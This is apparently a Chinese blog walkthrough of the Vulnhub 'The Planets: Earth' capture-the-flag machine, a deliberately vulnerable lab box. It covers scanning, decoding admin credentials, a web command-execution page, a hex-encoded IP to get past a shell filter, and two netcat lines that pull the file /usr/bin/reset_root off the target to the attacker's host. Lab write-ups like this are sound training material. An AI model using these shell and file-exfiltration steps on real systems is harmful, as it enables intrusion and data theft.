vulnhub-THE PLANETS EARTH
title: Vulnhub-THE PLANETS EARTH
tags: Vulnhub
abbrlink: d23a16db
date: 2022-10-07 09:07:46
描述
- Name: The Planets: Earth
- Date release: 2 Nov 2021
- Author: SirFlash
- Series: The Planets
Difficulty: Easy
Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
nmap 扫描
主机发现
ip扫描
修改hosts
写入
然后在访问
https://earth.local
和
https://terratest.earth.local
访问
https://earth.local/
https://terratest.earth.local/
扫描目录
访问
https://earth.local/admin/login
https://terratest.earth.local/robots.txt
- 最后一个
testingnotes.*
猜测后缀为 txt时有如下内容 - https://terratest.earth.local/testingnotes.txt
- https://terratest.earth.local/testdata.txt
分析(参考别人的)
Previous Messages:
testdata.txt:
别人的python代码
带入:
结果:
- 16进制解密:https://www.sojson.com/hexadecimal.html
发现全部是重复 : earthclimatechangebad4humans
因此得到了账号密码:
来到一个命令执行的界面
flag 1
- 可知共有两个flag,分别是 user 下 和 root 下
getshell
远程连接禁止。看别人说把ip转换16进制
http://www.metools.info/other/ipconvert162.html
提权
有一个reset_root很可疑
这里使用nc命令, nc 可用于传输文件。
先在kali上输入nc -nlvp 7788 >reset_root,开启监听
在靶机shell上输入nc 192.168.169.220 7788 < /usr/bin/reset_root
可以看到kali接收到数据并保存为reset_root.
- 使用strace工具检测reset_root文件的运行过程,如果没有可以下载安装下。